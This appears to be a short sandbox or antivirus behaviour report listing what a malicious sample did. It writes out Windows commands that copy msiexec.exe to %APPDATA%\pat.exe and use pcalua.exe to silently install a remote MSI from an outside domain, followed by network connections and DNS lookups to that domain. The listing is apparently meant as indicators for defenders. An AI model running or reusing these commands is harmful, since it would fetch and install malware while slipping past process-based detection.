Technical Information
- '<SYSTEM32>\expand.exe' <SYSTEM32>\msiexec.exe %APPDATA%\pat.exe
- '<SYSTEM32>\pcalua.exe' -a %APPDATA%\pat -c /Q /i https://inst.shconstmarket.com/veafdsag.msi?devop=ERtnsgSFAg
- '%APPDATA%\pat.exe' /Q /i https://inst.shconstmarket.com/veafdsag.msi?devop=ERtnsgSFAg
- %APPDATA%\pat.exe
- 'in##.##constmarket.com':443
- 'x1.#.lencr.org':80
- 'microsoft.com':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'in##.##constmarket.com':443
- DNS ASK in##.##constmarket.com
- DNS ASK x1.#.lencr.org
- DNS ASK microsoft.com